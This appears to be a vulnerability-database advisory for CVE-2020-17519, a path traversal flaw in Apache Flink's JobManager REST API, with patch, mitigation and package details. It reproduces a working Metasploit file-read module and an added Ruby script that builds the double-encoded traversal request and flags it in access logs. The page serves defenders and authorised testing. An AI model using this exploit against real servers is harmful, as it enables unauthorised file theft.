CVE-2020-17519

Listed in CISA KEV
Published 2021-01-06 · Modified 2024-05-23
CVSS v3
7.5 (High), base score computed from the vector below; the trailing E:H is the temporal Exploit Code Maturity metric, consistent with the public Metasploit module
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H
CVSS v4
not yet in upstream
VIR risk
2.5

Description

Apache Flink 1.11.0 through 1.11.2 contains an improper access control (path traversal) vulnerability in the JobManager REST interface: the /jobmanager/logs/<filename> endpoint accepts double-URL-encoded "../" sequences (%252f) in the filename, so an unauthenticated remote attacker can read any file on the JobManager's local filesystem that the JobManager process itself can read. Fixed in Flink 1.11.3.

CISA KEV

Vendor
Apache
Product
Flink
Due date
2024-06-13

Predictions

Exploit likelihood
99%
Patch ETA
not available

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

vendor · Authored 2026-05-27
Vendor advisory (via CISA KEV): "This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. Please check with specific vendors for information on patching status. For more information, please see: https://lists.apache.org/thread/typ0h03zyfrzjqlnb7plh64df1g2383d; https://nvd.nist.gov/vuln/detail/CVE-2020-17519"
The fix shipped in Flink 1.11.3 (see Package impact below). The vulnerable endpoint requires no authentication, so until the upgrade is done the JobManager web/REST port should not be reachable from untrusted networks.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-49398 · webapps · java · verified · ruby · 3 KB
SunCSR Team · 2021-01-08

Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)

Ruby exploit · Source: Exploit-DB
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Apache Flink File Read Vulnerability',
      'Description'    => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        in the JobManager REST API of Apache Flink 1.11.0 (also present in 1.11.1
        and 1.11.2), allowing arbitrary file read with the privileges of the
        JobManager process.
      },
      'Author'         =>
        [
          '0rich1 - Ant Security FG Lab', # Vulnerability discovery
          'Hoa Nguyen - Suncsr Team',    # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2020-17519'],
          ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
          ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jan 05 2021'
    ))

    register_options([
      OptInt.new('DEPTH', [true, 'Traversal depth (number of ../ segments)', 12]),
      OptString.new('FILEPATH', [true, 'The path of the file to read', '/etc/passwd'])
    ])
  end

  def run_host(ip)
    # Each "../" is double URL-encoded (%252f): the filename segment is decoded
    # once when the request path is parsed and again when the router extracts
    # it, so %252f survives the first decode as %2f and only then becomes "/".
    traversal = '..%252f' * datastore['DEPTH']
    # Strip the leading slash before encoding; the original checked for it
    # after the slashes had already been replaced, so the check never matched.
    filename = datastore['FILEPATH'].sub(%r{\A/}, '').gsub('/', '%252f')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'jobmanager', 'logs', "#{traversal}#{filename}")
    })

    fail_with Failure::Unreachable, 'Connection failed' unless res
    fail_with Failure::NotVulnerable, "Unexpected HTTP status #{res.code}; nothing was downloaded" if res.code != 200
    fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.empty?

    print_status('Downloading file...')
    print_line("\n#{res.body}\n")
    path = store_loot(
      'apache.traversal',
      'text/plain',
      ip,
      res.body,
      datastore['FILEPATH']
    )
    print_good("File saved in: #{path}")
  end
end
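The following Ruby script is an added example and is not code from Exploit-DB, the SunCSR module or the Apache Flink project. It ties the Description and the module above together: it builds the same double-encoded request, shows how two rounds of percent-decoding turn it into a path outside the log directory, and flags such requests in access-log lines. The log directory (/opt/flink/log), the reverse proxy writing the log, the sample log lines and the client addresses are all assumptions constructed for the example.

```ruby
# Added example (not from Exploit-DB or Apache Flink). Mirrors the request the
# Metasploit module sends, explains the double encoding, and detects it in logs.

LOGS_BASE = '/jobmanager/logs'.freeze
LOG_DIR   = '/opt/flink/log'.freeze   # assumed JobManager log directory

# Decode one layer of percent-encoding (%XX -> byte). Unlike
# URI.decode_www_form_component it leaves '+' alone, as a path parser does.
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# Build the request path the way the module does: DEPTH copies of the
# double-encoded "../" followed by the double-encoded target file.
def traversal_path(filepath, depth: 12)
  rel = filepath.sub(%r{\A/}, '')          # strip the leading slash first
  "#{LOGS_BASE}/#{'..%252f' * depth}#{rel.gsub('/', '%252f')}"
end

# What a vulnerable handler ends up opening: the :filename segment is decoded
# twice (once when the request path is parsed, once when the router extracts
# the segment), so %252f -> %2f -> "/", and the result is then resolved
# relative to the log directory.
def resolved_target(request_path)
  segment = request_path.sub("#{LOGS_BASE}/", '')
  once    = percent_decode(segment)   # "..%2f..%2fetc%2fpasswd": still one segment
  twice   = percent_decode(once)      # "../../etc/passwd": now escapes LOG_DIR
  File.expand_path(twice, LOG_DIR)    # clamps at "/" just as the OS would
end

# Detection: a request under /jobmanager/logs/ whose filename contains a ".."
# path component after zero, one or two rounds of decoding. Checking only the
# raw or once-decoded form (what many WAF rules do) misses the %252f variant.
DOTDOT = %r{(?:\A|/)\.\.(?:/|\z)}

def suspicious_request?(path)
  return false unless path.start_with?("#{LOGS_BASE}/")
  forms = [path.sub("#{LOGS_BASE}/", '')]
  2.times { forms << percent_decode(forms.last) }
  forms.any? { |f| f.match?(DOTDOT) }
end

# Constructed access-log lines (combined log format), assumed to come from a
# reverse proxy in front of the JobManager web/REST port.
SAMPLE_LOG = [
  '203.0.113.5 - - [06/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1837',
  '203.0.113.5 - - [06/Jan/2021:10:00:02 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120',
  '198.51.100.7 - - [06/Jan/2021:10:00:03 +0000] "GET /overview HTTP/1.1" 200 301'
].freeze

# Returns [client_ip, request_path] for every line that carries a traversal.
def flag_log_lines(lines)
  lines.each_with_object([]) do |line, hits|
    m = line.match(%r{\A(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/})
    next unless m && suspicious_request?(m[2])
    hits << [m[1], m[2]]
  end
end

if $PROGRAM_NAME == __FILE__
  req = traversal_path('/etc/passwd', depth: 12)
  puts "request : #{req}"
  puts "resolves: #{resolved_target(req)}"
  flag_log_lines(SAMPLE_LOG).each { |ip, path| puts "ALERT #{ip} #{path}" }
end
```

Run it with plain `ruby`; it needs no network and no Flink instance. The detector deliberately decodes up to twice because a rule that normalises only once sees `..%2f` rather than `../` and lets the request through.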

Metasploit modules

Apache Flink JobManager Traversal

Package impact

Ecosystem      Package                                  Vulnerable           Fixed
Maven (java)   org.apache.flink:flink-runtime_2.11      >=1.11.0, <1.11.3    1.11.3
Maven (java)   org.apache.flink:flink-runtime_2.12      >=1.11.0, <1.11.3    1.11.3

References

https://lists.apache.org/thread/typ0h03zyfrzjqlnb7plh64df1g2383d (Apache Flink announcement)
https://nvd.nist.gov/vuln/detail/CVE-2020-17519
http://www.openwall.com/lists/oss-security/2021/01/05/2
https://www.tenable.com/cve/CVE-2020-17519
https://www.exploit-db.com/exploits/49398